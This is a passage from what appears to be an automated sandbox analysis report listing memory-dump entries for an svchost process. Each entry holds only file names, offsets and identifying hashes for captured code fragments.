                                                                                      • Instruction Fuzzy Hash: E2515C31B199298FDB0ABBBCE8256ED7BA1EF88315F0400B7D108C72D3DE3864468791
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000012.00000002.2592493908.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_18_2_7ffd9b890000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f4a3577f31b6dd6a062fbbc40ea970e710a658b5970e4946c79e49d980b77575
                                                                                      • Instruction ID: 0006bceb1e5e9cc7387d5409b973a1d7645f69199bede8b9ae13ad8d35579ec0
                                                                                      • Opcode Fuzzy Hash: f4a3577f31b6dd6a062fbbc40ea970e710a658b5970e4946c79e49d980b77575
                                                                                      • Instruction Fuzzy Hash: D831E821B189484FEB9CEB6C9869679A7C2EF9C715F0505BEE04EC32E7DD58AC418341
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000012.00000002.2592493908.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_18_2_7ffd9b890000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: dfdd7a60f5dc4b0c0d48d97b17dedc26594b8be55b7c75ae02e31ef45c4636f9
                                                                                      • Instruction ID: 95025bffb81b61f83d03ad5ec39e9e600e06fb03cb74d898df4997138a206678
                                                                                      • Opcode Fuzzy Hash: dfdd7a60f5dc4b0c0d48d97b17dedc26594b8be55b7c75ae02e31ef45c4636f9
                                                                                      • Instruction Fuzzy Hash: 0031B461B19A094FEB99B7BC5C297FC7AD1EF98651F1402BBE01DC32D7DD2869028381
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000012.00000002.2592493908.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_18_2_7ffd9b890000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c4938945cc17d5aeae6f23b27146802ce31720aab457c864e0a1d3d301547e8b
                                                                                      • Instruction ID: 8338654542284b9a8cd213ffd579302b9110d5ff86045273ba30dc6a955f983c
                                                                                      • Opcode Fuzzy Hash: c4938945cc17d5aeae6f23b27146802ce31720aab457c864e0a1d3d301547e8b
                                                                                      • Instruction Fuzzy Hash: 71119E2A6087B18EC707B7B8B8A45D8BB60DE4226971801F7C2CACE4879518648B87E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000012.00000002.2592493908.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_18_2_7ffd9b890000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 20733231adffcf21d0fddb3473a6c26379845254aa4e0381a73cc4b7d0570b60
                                                                                      • Instruction ID: 486ec8a98abb0cf2bec319efc215067c15b1ac8afd2e8004f1037e1ba9ee349f
                                                                                      • Opcode Fuzzy Hash: 20733231adffcf21d0fddb3473a6c26379845254aa4e0381a73cc4b7d0570b60
                                                                                      • Instruction Fuzzy Hash: 48017B04E0EB8A4FEB65A7F85C75431BFE0CFD9740B0900BAE888C20F7D8086A458392